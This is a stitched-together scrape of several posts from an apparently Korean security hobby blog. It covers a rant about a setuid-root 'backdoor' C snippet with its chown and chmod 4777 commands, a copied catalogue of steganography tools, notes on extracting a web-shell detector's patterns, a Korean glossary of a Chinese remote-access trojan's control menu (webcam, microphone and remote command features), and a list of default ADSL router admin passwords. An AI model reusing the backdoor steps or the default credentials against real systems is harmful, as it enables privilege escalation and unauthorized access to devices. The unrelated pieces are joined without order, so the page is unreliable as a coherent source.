어떤 X친놈이..
소스코드를 올렸다.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void){
       setgid(0); setuid(0);

컴파일을 한 이후..
소유권자를.. 없는 계정인.. 500:users 로 설정했다.. -_-;;

chown 500:users backdoor

그 다음 예상한대로 setuid 설정을 한다.

chmod 4777 backdoor

그대로 따라해봤다............


안되자나............ 응?? 안되자나.................. 응???

도대체 넌 무슨 목적으로 없는 사용자인 500과 users라는 사용자 이름으로 권한을 준거니...?

니가 재정신이였으면.. root:root 로 설정했어야지.. 무슨 생각이니..???

대답 좀 해주렴.. 형이 궁금해서 그래...................

내가 모르는게 있는거니..?;;

아오.. 스트뤠쓰~~~

Javascript 디코딩 사이트

Binary 디코딩 사이트


'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

음?? 당했나?  (3) 2012.03.15
setuid(0) 설정.  (1) 2012.03.15
구글 봇탐지 기술..?  (0) 2012.02.12
휘슬(WHISTL) 2탄~  (4) 2012.01.09
펌 : http://www.jjtc.com/Steganography/tools.html
참고자료 : http://embeddedsw.net/EMUFDD_Floppy_Hardware_Emulator_Home.html
참고자료 : http://en.wikipedia.org/wiki/Steganography_tools

Manufacturer comparison
Program Image files Audio files Video files Document files Other support Notes
OpenPuff BMP, JPG, PNG, TGA Mp3, WAV 3gp, Mp4, MPEG-1, MPEG-2, VOB, SWF, FLV Pdf - Carrier chains, Multi-layered obfuscation
Red JPEG JPG - - - - XT for Total Commander, LZMA compression, PRNG-based masking and distribution
DarkCryptTC BMP, JPG, TIFF, PNG, PSD, TGA, MNG WAV - TXT, HTML, XML, ODT EXE, DLL, NTFS streams RSD mode (RNG-based random data distribution)
MP3Stego - Mp3 - - - -
OpenStego BMP, PNG - - - - -
S-Tools BMP, GIF Wav - - Unused floppy disk space -
StegFS - - - - Steganographic file system for Linux -
Steganographic Laboratory (VSL) BMP, PNG, JPG, TIFF - - - - -
PHP-Class StreamSteganography PNG - - - - -
Steganography Studio BMP, PNG, GIF - - - - A set of different hiding methods included
Anubis[clarification needed] all format[clarification needed]  ?  ?  ?  ?  ?

  1. Blindside by John Collomosse. Last known addresses: ma7jpc@bath.ac.uk http://www.blindside.co.uk/

  2. BMP Secrets by Parallel Worlds. Parallel Worlds is a company based in Kiev, capital of Ukraine. Tel.: +380 (44) 442 6077 Tel./Fax.: +380 (44) 442 0516 Pager: +380 (44) 461 0146 ab# 100252 GSM SMS: chekh@sms.umc.com.ua e-mail: chekh@pworlds.com · General Information: Info_PW@kbi.kiev.ua · Services: Services_PW@kbi.kiev.ua · Customer and Product Support: Support_PW@kbi.kiev.ua · Products Sales: Sales_PW@kbi.kiev.ua · Web design: webmaster_PW@kbi.kiev.ua · Other questions: admin_PW@kbi.kiev.ua Visit Parallel Worlds page at http://www.pworlds.com Visit our steganography page at http://www.pworlds.com/techn/steganography.phtml Visit BMP Secrets page at http://www.pworlds.com/products/bmp-secrets.phtml http://www.pworlds.com

  3. BMPEmbed v1.54 (DEMO) Data Embed by Brook Sandford and Ted Handel (LANL.gov) IMAGES: (BMP )

  4. BMPTable v2.16 (DEMO) Data Embed by Brook Sandford and Ted Handel (LANL.gov) Brook Sandford mts@lanl.gov Ted Handel thandel@lanl.gov IMAGES: (BMP )

  5. Camouflage 2.0 by Frederic Peters. Last known contact information for the author: Frédéric Péters, rue Chantraine, 38 4420 Montegnée Belgique e-mail : fpeters@chanae.alphanet.ch fpeters@mygale.org IMAGES: (TGA (24-bit uncompressed, 640x480, minimum of 921618 bytes). Author recommends using PNG. )

  6. Contraband Hell Edition (CHE) by Julius B. Thyssen & Hens Zimmerman of Immortalware / JTHZ Productions based in Amsterdam, The Netherlands. Last known urls: http://come.to/us or http://www.jthz.com/puter/ CHE runs on Win9x and process 24-bit BMP images

  7. Contraband, Contraband 9g by Julius B. Thyssen & Hens Zimmerman of Immortalware / JTHZ Productions based in Amsterdam, The Netherlands. Last known urls: http://come.to/us or http://www.jthz.com/puter/ CHE runs on Win9x and process 24-bit BMP images

  8. Courier v1.0 by Kelce Wilson. Last known address: http://pages.prodigy.net/robyn.wilson/ runs on Win32 systems and embeds in IMAGES: (BMP (24-bit - will convert lower resolutions to 24-bit) )

  9. Covert.tcp C source code for Covert Channels in the TCP/IP Protocol Suite by Craig H. Rowland. Published in f¡®sT - moñd@¥ (First Monday), Vol.2 No.5 - 5 May 1997. The article and source code are available from http://www.firstmonday.dk/issues/issue2_5/rowland/

  10. Data Stash v1.1, v1.1a Lim, Chooi Guan Previous addresses: webmaster@famousguy.net http://www.skyjuicesoftware.com/software/ds_info.html Claims to embed in the following media: IMAGES: (any binary ) AUDIO: (any binary ) TEXT: (yes, but suggest avoiding ) FILE/DISK: (any binary ) OTHER: (any binary )

  11. dc-Steganograph The application is also known as: DC-Stego and DiSi-Steganograph. A DOS program that hides data in 320x200 256 color PCX-files. Author's last known address: http://members.tripod.com/~Nikola_Injac/stegano/

  12. DCT-Steg (aka DCT-Jpeg) by Stefan Katzenbeisser embeds in JPEG images by manipulating the DCT coefficients

  13. Digital Picture Envelope by the Digital Picture Enveloping Research Group. Product is based on the BPCS Steganography research. Previous addresses: bpcs@know.comp.kyutech.ac.jp http://www.know.comp.kyutech.ac.jp/BPCSe/Dpenv-e/DPENVe-home.html The application runs on Win32. IMAGES: (BMP (adaptive) )

  14. Diskhide by MTC Medincom (Russia). DOS application that hides data on disks

  15. Dmagic by Ðerek de Oliveira (Russia) Previous addresses: dede11@hotmail.com and BigD99860@juno.com Hides files and folders on Windows systems

  16. DPT (Data Privacy Tool) by Bernard Last known URL: http://www.xs4all.nl/~bernard/home_e.html Hides in BMP images. The author recommends 24-bit BMPs

  17. EasyPrivacy Pro v2.1.1 by D4F Corp Last known addresses: Landstrasse 25, 9490 Vaduz, Liechtenstein ( Europe ) Mail@digi4fun.com or webmaster@digi4fun.com http://www.digi4fun.com/EasyPrivacy.html The application runs on Win32 systems and embeds in BMP images

  18. EIKONAmark by I. Pitas is now a series of watermarking products that embed in a variety of media types. The original EIKONAmark processed images: (input: BMP, JPG, TIF, TGA, GIF output: TIF, TGA, JPG)

  19. Empty Pic by Robert Wallingford. Previous addresses: wallingford@usa.net, prof.engineer@usa.net, and robertw@crtelco.com URL: http://www.crtelco.com/~robertw/ Empty Pic is a command line tool for Windows that "hides" a GIF image by replacing the palette with a single color. The original may be restored with the software.

  20. Encrypt Pic by Fredric Collin. Previous addresses: Frederic.Collin@advalvas.be, http://members.nbci.com/_XMCM/fredc/index2.html http://members.nbci.com/_XMCM/fredc/encryptpic.html http://members.xoom.com/fredc/encryptpic.html The application runs on Win32 systems. Data is embedded in BMP images.

  21. Encrypted Magic Folders (EMF) (also Magic Folders) by PC Magic Software Addresses: info@pc-magic.com http://www.pc-magic.com/ This application hides and encrypts files and folders

  22. EzStego by Romana Machado, author of Stego1a2 for the Mac. EzStego is "steganography made easy" - previously available at http://www.stego.com. EzStego is an implementation of Stego in Java. Stego is available at http://www.nic.funet.fi/pub/crypt/steganography/

  23. F5 by Andreas Westfeld (Dresden, Germany) Previous addresses: westfeld@inf.tu-dresden.de http://www.inf.tu-dresden.de/~aw4 The application hides in JPEG images by manipulating the DCT coefficients

  24. FatMacPGP 2.6.3 Previous address: http://www.math.ohio-state.edu/~fiedorow/PGP This application is for MAC computers

  25. FFEncode Hides data in a Morse code of null characters. The file maybe downloaded from http://www.rugeley.demon.co.uk/security/encrypt.htm (UK).

  26. Folder Guard Jr. (also see Folder Guard) by WinAbility (Andrei Belogortseff). Previous address: WinAbility, P.O.Box 5534 Buffalo Grove, IL 60089-5534 U.S.A. http://www.winability.com WIN: (9x/Me/NT/2000 ) FILE/DISK: (hide files & folders )

  27. Folder Guard by WinAbility (Andrei Belogortseff). WinAbility? P.O.Box 5534 Buffalo Grove, IL 60089-5534 U.S.A. http://www.winability.com This product has more features than Folder Guard Jr. WIN: (Win 9x/Me/@K/XP/Vista ) FILE/DISK: (hide files & folders )

  28. Ghost Host by Kelce Wilson. Previous address: http://pages.prodigy.net/robyn.wilson/ WIN: (Win ) FILE/DISK: (Hides (appends) "ghost" files at the end for other files. )

  29. Gif-It-Up by Lee Nelson. Win32 application that hides in GIF images.

  30. Gifshuffle by Matthew Kwan (Darkside Technologies) - Australia. Previous addresses: mkwan@darkside.com.au http://www.darkside.com.au/gifshuffle/ WIN: (Win (DOS) ) IMAGES: (GIF (palette manipulation) )

  31. Giovanni by BlueSpike, Inc (Scott Moskowitz). http://www.bluespike.com Bluespike offers watermarking products for various media formats

  32. Gzsteg by Andy Brown and Ken Pizzini hides in GZ compressed files and is available at http://www.nic.funet.fi/pub/crypt/steganography/

  33. Hermetic Stego by Peter Meyer, Hermetic Systems This program is capable of hiding in a BMP image or across multiple BMP images. More information and download from http://www.hermetic.ch/hst/hst.htm

  34. Hidden by Evgeny Vasjuk Previous addresses: evgenyww@bashnet.ru evgenyww@windoms.sitek.net http://www.bashnet.ru/~evgenyww/ FILE/DISK: (hide files and folders )

  35. Hide and Seek by Colin Maroney Hide and Seek 4.1 http://www.nic.funet.fi/pub/crypt/steganography/ (Finland) and Hide and Seek 5.0 is significant update to hideseek v4.1 which includes a lot of new features. Available at www.rugeley.demon.co.uk (UK) Hide and Seek for Windows 95 is also available

  36. Hide In Picture by Davi Tassinari de Figueiredo. Previous addresses: davitf@usa.net http://www.brasil.terravista.pt/Jenipabu/2571 PORTUGAL http://www.brasil.terravista.pt/Jenipabu/2571/e_hip.htm WIN: (9x/Win32) IMAGES: (BMP )

  37. Hide Unhide (Hide) by GRYPHON Microproducts (no longer exists). Previous address: PO BOX 10087, Silver Spring, MD 20914, USA DOS command line IMAGES: (TIFF)

  38. Hide by Toby Sharp. Previous addresses: Secret Software TSharp@Serif.com http://www.geocities.com/toby.sharp/hidev2.zip WIN32 IMAGES: (24-bit color, 8-bit grayscale )

  39. Hide4PGP by Heinz Repp hides data in BMP, WAV, and VOC files. Available from the author's website: http://www.heinz-repp.onlinehome.de/Hide4PGP.htm (Germany)

  40. Hideme (Hide Me) for Windows (encryption tool) by Terry Mechan Olympic Communications Previous address: Olympic@Netwales.co.uk http://www.fis.lv/olympic Hides files & directories by encrypting them and placing them in a "hide me" file

  41. In Plain View (IPV) by 9-Yards Computing. Previous addresses: jweiler@9-Yards.com http://www.9-Yards.com Win32 IMAGES: (BMP (24-bit) )

  42. InThePicture (ITP) 2.01, 2.02 by INTAR Technologies. Previous addresses: 23 Sapphire Drive Barons Wood Royal Leamington Spa Warwickshire, CV31 3LB ENGLAND Administrative Contact, Billing Contact: Hogg, Ash (AH2184) ash@INTAR.COM Intar Technologies Limited 12 Penfold Close Bishops Tachbrook Leamington Spa CV33 9SF UK +44-(0)1926-426621 (FAX) +44-(0)1926-426621 http://www.intar.com/ITP/itpinfo.htm WIN: (9x ) IMAGES: (BMP (4-bit, 8-bit, 24-bit) )

  43. Invisible Encryption by Bernd Binder Fractal Iteration of Information (FITIN) Germany http://www.fitin.com (down for some time) Written in JAva IMAGES: (GIF )

  44. Invisible Files 2000 (IF2000), Pro v5.0 (IF2000 Pro) by ANNA Ltd. Previous addresses: if2000@anna.zaporizhzhe.ua Technical Support: support@softsecurity.com Any other questions: contact@softsecurity.com FAX: (508) 355-8507 http://www.softsecurity.com WIN: (9x ) FILE/DISK: (hides files and folders )

  45. Invisible Secrets (numberous versions - also marketed as 1-2-Free Steganography) originally by NeoByte? Solutions. Headquarters: Aleea Rogerius 12 Bloc H1, Ap. 11 Oradea Romania Previous addresses: Corporate WWW: http://www.neobytesolutions.com Invisible Secrets homepage : http://www.invisiblesecrets.com WIN: Win32 Claims to hide in: IMAGES: (BMP, PNG, JPG) AUDIO: (WAV) TEXT: (HTML)

  46. jpeg-jsteg DOS hides information in the DCT coefficients of JPEG's JFIF image format. FTP-Server: http://www.nic.funet.fi/pub/crypt/steganography/ (Finland)

  47. JPHS (aka JPHide JPSeek, JP hide and seek) by Allan Latham Previous address: http://linux01.gwdg.de/~alatham/stego.html Windows Command line and linux versions IMAGES: (JPG )

  48. JPHSWin by Allan Latham. A Windows OS graphical implementation of JPHS. WIN: (9x ) IMAGES: (JPG )

  49. Jsteg Shell by John Korejwa Previous address: http://www.tiac.net/users/korejwa/jsteg.htm GUI front end for jpeg-jsteg. WIN: (9x/NT ) IMAGES: ( JPG - LSB of DCT coefficients )

  50. Magic Folders (MF) (also see Encrypted Magic Folders) by RSE Software Inc.(PC Magic Software). http://www.pc-magic.com/ FILE/DISK: (Hide files and folders )

  51. Makes Files Invisible (MFI) by PC Magic Software Previous address: MFI Registration 1157 57th Drive SE Auburn, WA 98092 (253) 939-4105 http://pc-magic.com WIN: (3.x/9x ) FILE/DISK: (hide files )

  52. Mandelsteg by Henry Hastur DOS Command line product. Generates GIF images of Mandelbrot Fractal graphics for hiding data.

  53. Mimic by Peter Wayner. Generates text using context free grammar

  54. MP3Stego, MP3Stego_GUI by Fabien Petitcolas. http://www.petitcolas.net/fabien/steganography/mp3stego/index.html AUDIO: (MP3 )

  55. MP3Stegz, by Achmad Zaenuri claims to hide a file (of any type) inside mp3 without changing it's size and sound quality. http://achmadz.blogspot.com/2008/05/hide-any-file-inside-mp3-file.html AUDIO: (MP3 )

  56. Nicetext by George Davida and Mark T. Chapman Previous addresses: markc@ctgi.net http://www.nicetext.com/ http://www.ctgi.net/nicetext/ Pseudo-random text-based stego using context-free grammer and customizable dictionaries

  57. Outguess by Niels Provos http://www.outguess.org/ Another tool for hiding in DCT coefficients of JPEG images.

  58. Paranoid by Nathan Mariels. Paranoid is primarily an encryption program that allows you to encrypt files with IDEA, triple DES, and an algorithm written by the author Nathan Mariels. It is a steganography program in that it allows you to hide files in sounds. FTP-Server: ftp://ftp.hacktic.nl/pub/crypto/macintosh/ (The Netherlands)

  59. PGE - Pretty Good Envelope Hides data file into a GIF or JPG file of any size or resolution using a very simple method of appending the message to the file, and then appending a 4 byte little endian number which points to the start of the message. The encryption used is considered "weak" by the author, using another encryption method prior to applying PGE is recommended. Download from Version 1.0 (includes encryption) http://www.rugeley.demon.co.uk/security/encrypt.htm (UK) or version 2.0 (does not include encryption)http://www.afn.org/~afn21533/rgdprogs.htm (US).

  60. PGM Stealth by Timo Rinne and Cirion oy Available at http://www.nic.funet.fi/pub/crypt/steganography/ (Finland) IMAGES: (PGM )

  61. PGPn123 A Windows front-end to PGP, which will hide a text file inside text. Basically a PGP shell tool that also includes a steganography option. Two versions are available: pn123-05.zip (freeware) and an enhanced version pn123e18.zip (shareware). Both may be available at http://www.stegoarchive.com (US)

  62. PicSecret by Andrew Lee (Cortic Software). PicSecret allows users to hide text messages in images. Available for Mac OS X (free) and as a web-interface online at http://www.picsecret.com

  63. PIILO, PILO by Tuomas Aura (now with Microsoft Research). Hides in PGM images

  64. PixelTag by Joshua Smith and Barrett Comiskey (previously with MIT Media Lab). Previous address: http://www.media.mit.edu/pixeltag

  65. Puff v1.01, 2.00 and OpenPuff v2.00, v3.01 by Cosimo Oliboni (Italy): Puff/OpenPuff is a significant rewrite and uses multiple encryption algorithms. Puff 2.X is not compatible with v 1.01. Due to a cryptography rewrite, v3.X is not compatible with v2.X. V3.00 was removed due to a bug in the unhiding routine - this is fixed in v3.01. Carriers for steganogrphic content includes: Images: (BMP, JPG, PCX, PNG, TGA), Audio: (AIFF, MP3, NEXT/SUN, WAV), Video: (3GP, FLV, MP4, MPG, SWF, VOB) in unused space, Files: (WIN PE MODULES). http://members.fortunecity.it/blackvisionit/PUFFV200.HTM

  66. S-Mail by Security Software Development (SSD) Ltd. Previous addresses: Nassau - BAHAMAS http://www.ssdltd.com http://www.privacysoftware.com/ Versions for DOS 5.0+ and Win32 Hides in EXE and DLL files

  67. S-Tools by Andrew Brown - S-Tools hides in a variety of cover media. This software is a good illustration of different versions hiding in different media. These versions cover hiding in BMP, GIF, WAV, and even on unused floppy disk space. Download: S-Tools 1.0 S-Tools 2.0 S-Tools 3.0 S-Tools 4.0 FTP-Server: ftp://ftp.funet.fi/pub/crypt/mirrors/idea.sec.dsi.unimi.it/code/ (Finland)

  68. Safer v2.0 (kill v1.2, unkill v2.0) by C. Petermann (CpH). Versions available for DOS 5.0+, OpenDOS, Win32, and Amiga operating sytems Hides data on floppies

  69. SandMark watermarking software by Christian Collberg and Gregg Townsend. Previous address: http://www.cs.arizona.edu/sandmark/ Unix/Linux: ( ) Watermarks Java code

  70. ScramDisk by Anonymous (AMAN) Author of the program wishes to remain anonymous. ScramDisk support could once be obtained through the alt.security.scramdisk newsgroup. The author uses the pseudonym AMAN. Information about Scramdisk is hosted by Sam Simpson. (scramdisk@samsimpson.com) Previous address: http://www.scramdisk.clara.net/ Several products have been derived from Scramdisk. A sourceforge project is also avilable providing Scramdisk 4 Linux (SD4L) based on this product. Win32 AUDIO: (WAV )

  71. Scytale by Patrick Buseine is a Windows PGP interface that includes an option to hide data in .PCX files. Previous website http://scytale.rever.fr/main.html (France)

  72. SGPO (SteganoGifPaletteOrder) by David Glaude and Didier Barzin. Previous contact information: David GLAUDE: glu@who.net http://www.geocities.com/SiliconValley/Heights/2099/index.htm. Didier BARZIN: didier@unforgettable.com http://student.ulb.ac.be/~dbarzin/. Written in Java IMAGES: (GIF (palette) )

  73. SilentEye by Anselme Chorein. SilentEye is a cross-platform application with binaries and source code available for Windows and Linux with MAC OSX version coming soon. Steganographic processing supports BMP images and WAV audio files. http://www.silenteye.org.

  74. Snow (also variants include !SnowDOS, SnowJava, JSnow By Matthew Kwan is available in both DOS and JAVA executable formats. "snow exploits the steganographic nature of whitespace. Locating trailing whitespace in text is like finding a polar bear in a snowstorm. And it uses the ICE encryption algorithm, so the name is thematically consistent." Information and software is available at http://www.darkside.com.au/snow/index.html (Australia)

  75. Snowdisk by Scott G. Miller. Previous address: scgmille@indiana.edu Linux software for hiding on unused diskspace. Fills the disk space with the encrypted contents of and random data.

  76. Spam Mimic (spammimic) by David Mckellar. See: http://www.spammimic.com/ for more information Generates spam-like text and fake PGP blocks to hide data

  77. Spyder by Lucas (Luke) Natraj. Command line tool IMAGES: (BMP 8-bit )

  78. Stash (Stash-It) by Chris Losinger, Smaller Animals Software, Inc. Previous Contact information: Administrative Contact, Billing Contact: Losinger, Chris (CL4280) chrisdl@PAGESZ.NET Smaller Animals Software, Inc. 8701 Walkelin Ct Raleigh, NC 27615 919-844-7951 (FAX) 9198447951 http://www.smalleranimals.com Win32 IMAGES: (256-color PCX, BMP / 24-bit BMP, TIFF, PNG, PCX)

  79. Stealth A PGP tool for steganography which strips any standard headers off of a PGP encrypted message to make the result look like random noise. Download from Adam Back's site http://cypherspace.org/adam/stealth/ (UK) Version 2.01b is avilable at ftp://ftp.hacktic.nl/pub/crypto/steganographic/ (The Netherlands) Versions are also available at: http://www.nic.funet.fi/pub/crypt/steganography/ (Finland)

  80. Stealthencrypt Internet Security Suite by Herb Kraft or Amy Seeberger, Sublimated Software. Previous contact information: 703 Pier Avenue B330 Hermosa Beach, CA 90254 http://www.stealthencrypt.com/ Windows IMAGES: (BMP, TIF )

  81. Stegano (also WinStegano and steg_win) by Thomas Biel DOS and Windows applications for hiding data in BMP images

  82. Steganos - Steganos Security Suite by Fabian Hansmann (Steganos.com) hides data in BMP, VOC, WAV and ASCII files. See http://www.steganos.com for the latest information. (Germany) Earlier versions of steganos are available at: ftp://ftp.funet.fi/pub/crypt/mirrors/idea.sec.dsi.unimi.it/code/ (Finland) Steganos 1.4 is a small DOS program Steganos for Windows 95 is an upgrade version 1.4 The Steganos Security Suite was introduced in version 2.0 Version 3r5 is avilable at ftp://ftp.hacktic.nl/pub/crypto/steganographic/ (The Netherlands)

  83. StegFS (Steganographic File System) by Andrew D. McDonald. Previous addresses: http://www.mcdonald.org.uk/andrew/ http://ban.joh.cam.ac.uk/~adm36/StegFS Linux

  84. Steghide by Stefan Hetzl. http://steghide.sourceforge.net/ Source code is aviailable and several ports are available for different operating systems. IMAGES: (BMP) AUDIO: (WAV, AU )

  85. StegMark (also StegComm and StegSign) by DataMark Technologies (Singapore). Contact information: DataMark Technologies Pte Ltd Suite 106, Innovation Centre, Block 1, 16 Nanyang Drive Republic of Singapore 637722 Tel: (65)-793-7725 (65)-793-7726 Fax: (65)-793-7790 Email: support@datamark-tech.com http://www.datamark-tech.com/index.htm Claims to embed in multiple file formats and media types IMAGES: (BMP, JPG, GIF, TGA, TIFF, PNG ) AUDIO: (MIDI, WAV, AVI, MPEG )

  86. Stego - Steganosaurus, Stegosaurus by John Walker - Text-based steganography program to send encrypted messages and files. For more information and syntax see: http://www.fourmilab.ch/nav/topics/crypto.html (Switzerland) public domain.

  87. Stego (Stego v1.0a2) by Romana Machado is a steganography tool that enables you to embed data in Macintosh PICT format files, without changing the appearance or size of the PICT file. Thus, Stego can be used as an "envelope" to hide a previously encrypted data file in a PICT file, making it much less likely to be detected. Available at: http://www.nic.funet.fi/pub/crypt/steganography/(Italy) and ftp://ftp.hacktic.nl/pub/crypto/macintosh/ (The Netherlands)

  88. Stegodos also known as Black Wolf's Picture Encoder by Black Wolf. This is a command line tool (actually several) that hide in 256-color screen captures. The screen captures are 320x200. Available at http://www.nic.funet.fi/pub/crypt/steganography/ (Finland) and ftp://idea.sec.dsi.unimi.it/security/crypt/cypherpunks/steganography/ (Italy)

  89. Stegotif by Giovambattista Pulcini. Previous addresses: http://www.verrando.com/pulcini http://www.geocities.com/SiliconValley/9210 Win32 command line IMAGES: (TIFF, TGA (LSB 24-bit RGB) )

  90. Stegowav by Giovambattista Pulcini Previous addresses: http://www.verrando.com/pulcini http://www.geocities.com/SiliconValley/9210 Command line tool (WinDOS) AUDIO: (RIFF (8/16 bits) PCM wave (.WAV) )

  91. Stegowav by Peter Heist. Previous addresses: heistp@rpi.edu and heistp@voicenet.com Java code AUDIO: (Microsoft WAV )

  92. StegParty by Steven E. Hugg. Previous Contact Info: Hamco Software (COMETBUSTERS-DOM) 1249 Turkey Point Rd Edgewater, MD 21037 USS Previous e-mail hugg@POBOX.COM http://www.cometbusters.com/hugg/projects/stegparty.html Unix/Linux Generates text to hide data (not random gibberish)

  93. Stext by Ulrich Kuehn. Previous address: ulrich.kuehn@t-online.de Command line application that generates text to hide information

  94. SubiText also TextSign Watermark by Compris.com Previous contact information: Compris.com Opelstr. 10 D-67661 Kaiserslautern-Siegelbach Germany phone: (+49) 06301 - 703340 fax: (+49) 06301 - 703119 E-Mail:mailto:TextSign@compris.com http://www.textsign.com/

  95. Suresign (Signum) by Signum Technologies http://www.signumtech.com Windows and MAC versions of the watermarking application. Claims: IMAGES: (Invisible watermark and visible logo with Photoshop Plug-in ) AUDIO: (WAV files with the Cool Edit Audio Plug-in )

  96. SysCop by MediaSec Technologies LLC Previous contact information: MediaSec Technologies LLC 321 South Main Street, Suite 2 Providence, RI 02903 USA Tel: (401) 453 6363 x 108 Fax: (401) 453 0444 Email: info@mediasec.com http://www.mediasec.com Digital watermarking products for for Windows, Mac, and Linux Carriers: Images, MPEG-1, MPEG-2

  97. Textego by Chirs Huson. Previouis address: http://www.soltec.net/~huson/ TEXT: (substituion cipher that makes text files look like a cross between mad libs and bad poetry )

  98. TextHide (see SubiText)

  99. Texto Texto by Kevin Maher is a text steganography program which transforms uuencoded or PGP ascii-armoured ascii data into English sentences. Texto text files look like something between mad libs and bad poetry, (although they do sometimes contain deep cosmic truths) and should be close enough to normal english to get past simple-minded mail scanners. FTP-Server: http://www.nic.funet.fi/pub/crypt/steganography/ (Finland)

  100. Virtual Steganographic Laboratory (VSL) by Michal Wegrzyn is a graphical block diagramming tool that allows complex using, testing and adjusting of methods both for image steganography and steganalysis. VSL provides friendly GUI along with modular, plug-in architecture. Available at Sourceforge.

  101. VisualCrypto (Visual Cryptography) by Jouko Holopainen . Previous contact information: Purjehtijantie 4 A 10 FIN-90560 Oulu FINLAND jhol@gnosis.pp.fi as of 1996-05-14 Versions for Windows, MAc, and Linux IMAGES: (Input from PGM (B&W) images and output to Postscript (PS). )

  102. Vodka-tonic by lordlsd is a cryptography-steganography hybrid tool. It can hide data into different filetypes and encrypt the information. Available at http://www.astalavista.com/index.php?section=directory&cmd=detail&id=3181

  103. wbStego by Werner Bailer is a steganography to hide data in bitmaps, text files and HTML files. Available at http://www.8ung.at/wbailer/wbstego/ (Austria)

  104. WitnesSoft No longer available. Used to be offered by Aliroo. WitnesSoft contained DocSec - Invisible, scannable label for organizational document security. PrintAuthentic - Invisible, programmable background for official document authentication. SoftProtect - Built in marking mechanism for software protection. CopyRight - invisible page marking of for copyright protection of printed intellectual property.

  105. Wnstorm - White Noise Storm Wnstorm (White Noise Storm) is a cryptography and steganography software package which you can use to encrypt and hide files within PCX images. Available at http://www.nic.funet.fi/pub/crypt/steganography/ (Finland)

  106. Xidie Security Suite Xidie is one of the most complete, innovative and complex application in steganography branch. Offer over 50 carrier types including many new technologies like ADS, Microsoft Office carrier, Registry keys etc. Most of carrier types implemented in Xidie are unique:Tiff and Word, Excel workbooks, Access databases Registry keys, Microsoft console documents, Event log files Cookies, subtitles, dictionary and PDF documents, Alternate data streams and attaching method with multiple files carrier. Commercial site: http://www.stegano.ro Technical specifications: http://web.clicknet.ro/xidie/index.html

  107. Z-File (Zfile Camouflage and Encryption System) by INFOSEC Information Security Company, Ltd. (Taiwan) Previous addresses: http://www.in4sec.com (no longer) http://www.infosec.com.tw (no longer) Win32 application IMAGES: (BMP)

구글에 검색을 하던 도중 아래와 같은 창이 떴습니다.
처음보는거라.. 신기한데..

혹시 주위에 이런 창 보신 분 계신가요? ^^;

구글은 어떤 기능으로 이렇게 제한하는지 궁금하네요.
단순히 Count 횟수제한으로 이런게 발생할까요? ^^;;

아무튼 신기하네요

작년 1월 경, 휘슬 패턴을 추출한적이 있습니다.
지인이 해보라고 해서.. 했던거고.. 그땐 그걸 어떤식으로 사용할 수 있을지를 몰랐더랬죠..
1년이 지난 얼마전에 다시 한번 휘슬 패턴을 추출하였습니다.
역시.. 이번 추출도 공부 목적!!
(단, 저번에는 뚫는데 목적이 있었으나.. 이번엔 웹쉘 탐지패턴을 이해하고자 하는 바램에서.. ^^;)

근데 저번이랑 똑같은 프로그램인데도.. 작년이랑 틀리게.. 너무 쉽게 풀어버렸습니다;;
작년엔 왜 코드의 흐름을 그렇게 생각했을까요? ^^;;

암튼.. 아래가 휘슬 패턴의 일부분 입니다.

너무 작나요? ^^; 클릭하면 크게 보일지도 모르겠네요..

좌측이 작년버전.. 우측이 얼마전에 추출한 버전입니다.
뭔가 이상한게 보이시나요?

네. 패턴 넘버는 똑같은데 패턴이 조금 변경된 것들이 다수 있네요.
네. 패턴이 삭제된 것들이 있네요.
네. 패턴이 추가된 것들이 있네요.

홈페이지에도 패턴 업데이트 관련 공지사항이 없어 언제 업데이트가 된건진 모르겠으나..
업데이트가 되고있고
업데이트 시, 패턴 파일 전체가 업데이트 되는 듯 싶으며..
꾸준히 관리하면서 오탐나는 패턴은 수정/삭제가 이루어지는 듯한 모습이네요.

올해 추출한 패턴은 1144개.
구체적으로 추가/변경/삭제 된 패턴은 비교분석해봐야 알겠지만.. 이 또한 공부가 많이 되겠네요 ^^

.text 代码段,可以被读取,可以被执行
.rdata 存放只读数据(字符串字面值,常量以及调试目录信息)
.data 数据区段除了上面的static变量,还有存储在堆栈段的自动变量,其他所有变量都在.data里,典型的有各类全局变量
.idata 输入的dll函数信息
.edata 输出函数用的
.rsrc 文件资源节
.reloc 重定位区段(基址重定位表)
.mackt 是Import Reconstructor修复输入表时候添加的节



'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

구글 봇탐지 기술..?  (0) 2012.02.12
휘슬(WHISTL) 2탄~  (4) 2012.01.09
중국어 번역. RAT  (0) 2011.12.06
部分ADSL路由器默认帐号密码  (0) 2011.12.05
[펌]Reverse Shell Cheat Sheet  (0) 2011.09.28
被控端 주인    
生成被控端 호스트 생성
置默被控端图标 기본 호스트 아이콘 설정
动连接被控端 수동 호스트 연결
批量更新被控端 일괄 호스트 업데이트
更新被控端接地址 업데이트 호스트 연결 주소
(重新接) 연결 끊기 (다시 연결)
关闭被控端 호스트 종료
卸載被控端 호스트 제거
筛选 필터
磁盘 디스크    
文件管理 디스크 파일 관리
络计算机 네트워크 컴퓨터
实时操作 화면 실시간 운영
자동 스크린샷
播放 애니메이션
停止播放 재생 중지
播放所有被控端 모든 호스트에 대해 애니메이션 반복
送全屏画 전체화면 보내기
关闭屏画 전체화면 닫기
程管理器 프로세스 관리
编辑 레지스트리 편집기
系统管理 서비스 관리 시스템
行DOS命令 DOS 명령 실행
注销 끄기 (로그아웃)
重新启动 다시 시작
关闭计算机 컴퓨터 종료
系统信息 시스템 정보
前窗口列表 현재 윈도우 목록
页浏览历录 (비활성화) 기록된 웹 검색 기록
URL 열기
操作所有被控端 모든 호스트에 대한 작업
摄像头监控 감시카메라
风监听 (BETA) 마이크 모니터링
信息框 정보 상자
停止音乐播放 음악 플레이 중지
出光 CD-ROM 열기
关闭 CD-ROM 닫기
程序 프로그램    
设置主机各标识 로고의 호스트를 설정합니다
分组设置 그룹 설정
系统设 시스템 설정
动态域名 동적 도메인네임 (DDNS)
FTP自动更新IP FTP 자동업데이트 IP
接代理服 프록시 서버 연결
重新启动 서비스 재시작
本机被控端检测 로컬 호스트 탐지
看操作日志 작업 로그 확인
置主界面皮 주 인터페이스 스킨
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演示和常见问题 애니메이션 및 FAQ
更新 업데이트 확인
프로그램 정보
艾玛 701g
用户名:admin 密码:admin
用户名:SZIM 密码:SZIM
用户名:admin 密码:epicrouter
home gateway
管理名:admin 密:epicrouter
用户名:user 密码:password
用户名:root 密码:grouter
用户名:adsl 密码:adsl1234
用户名:root 密码:root
用户名:admin 密码:dare
用户名:admin 密码:12345
用户名:anonymous 密码:1234
